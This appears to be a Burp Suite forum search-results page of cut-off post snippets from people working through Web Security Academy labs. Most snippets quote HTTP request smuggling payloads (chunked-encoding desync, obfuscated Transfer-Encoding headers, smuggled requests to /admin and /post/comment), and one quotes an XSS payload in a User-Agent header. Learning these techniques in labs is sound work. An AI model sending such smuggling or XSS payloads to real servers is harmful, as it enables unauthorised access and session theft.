Burp Suite User Forum
Found 50 posts in 41 threads
responses" is given as
"POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … server was given as
"GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … should be like this:
"GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Content-Length: 146
x=POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded … HTTP/1.1
Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 272
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Symfony Version: 4.3.6
PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
Thanks
POST / HTTP/1.1
Host: my host.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded … HTTP/1.1
Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 105
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
i sent:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
p9a5ei0x99qi74vejsq36czp0tn1z3d6, xlbjcoe8ecul6sfmtdrt5cm8qqr6o7hx]) Invalid access token for user carlos in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
HTTP/1.1
Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
portwigger:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
POST /dz588q90/xhr/api/v2/collector/beacon HTTP/1.1
Host: www.---------.com
Origin: http://example.com … : */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded … Content-Length: 1410
Origin: https://www.--------.com
Connection: close
Referer: https://www.realself.com
The URL is http://burp/ - there's no www.
receiving this error:
PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
My secret key: f99oqo0667s8noe1clqktoa99mnzvuq2
this error:
Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
Then, what I did is:
Modifying serialized objects"
PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4
Stack trace:
#0 {main}
thrown in /var/www/index.php on line 4
echo "O:4:"User":2
3 directory or 4 directory under root directory eg image(218.png) can we present in directory /var/www … /image/218.png or /var/www/image/abc/218.png, How we get to know this for applying Directory traversal
HTTP/1.1
Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … username=carlos HTTP/1.1
X-ayZFvQ-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length
error
Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
provided is:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
burp request ..Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:5 Stack trace: #0 {main} thrown in /var/www/index.php on line 5
HTTP/1.1
Host: 0abd00da04a3b710c0c4a56b002200b3.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: ac7a1f911ef7995e80d3ec5300020083.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-acab1f4f1e8899f38092ec9101ef005c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Please see below:
POST / HTTP/1.1
Host: <lab-ID>.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a4200c60375b196c058f06300d100b9.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
response when i sent this request
POST / HTTP/1.1
Host: my lab id
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: ac6d1fc91e74b3a4808926fc009c005a.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
the lab
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: ac4f1f451ed62abd80777fe600120062.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 277
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Connection: keep-alive
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
com.host1.www
com.host1.www1
com.net2.www
even though the hostnames are actually displayed as expected
Here is what is shown in the Site map window right above (list of all URLs):
https://www. … id=WEB87431-20150616190 HTTP/1.1
Same with:
https://www._something_ com/ - GET - /bp_chart.php?
I'll past the request:
POST / HTTP/1.1
Host: victimhost
Content-Type: application/x-www-form-urlencoded … postId=1 HTTP/1.1
Host: exploitserver
Content-Type: application/x-www-form-urlencoded
Content-Length
Exploit:
```
POST / HTTP/1.1
Host: my-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … postId=5 HTTP/1.1
User-Agent: a"/><script>alert(1)</script>
Content-Type: application/x-www-form-urlencoded
vulnerabilities:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0ac800a704bbd7328148caab006b0005.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
acc91f4d1faf6485c0b70322000b009b.web-security-academy.net
Cookie: session=bWpx0z3BW0qJhvBVGo9kof3BBkwpv3qU
Content-Type: application/x-www-form-urlencoded … Transfer-encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Length: 600
Content-Type: application/x-www-form-urlencoded
reads as below:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
0
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … supposed to be:
0
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
/my_profile;jsessionid=560423289919l0e2g6f88f71qjg4xp1z2uwc408389.5604232899 HTTP/1.1
Host: www..... … Connection: close
Content-Length: 3002
X-Single-Page-Navigation: true
Origin: https://www.....
Technical_notes/Add_a_second_IP_address_to_an_existing_network_adapter_on_Windows and "Linux":https://www
PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www … :/usr/share/php') in /var/www/index.php on line 1
And I am unable to log in, therefore no request … https://0ad70019033a57a1c05c334c004d0082.web-security-academy.net/login
Content-Type: application/x-www-form-urlencoded … is-warning>PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www … :/usr/share/php') in /var/www/index.php on line 1</p>
</div>
</section
HTTP/1.1
Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
60
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded … POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters)
Content-Type: application/x-www-form-urlencoded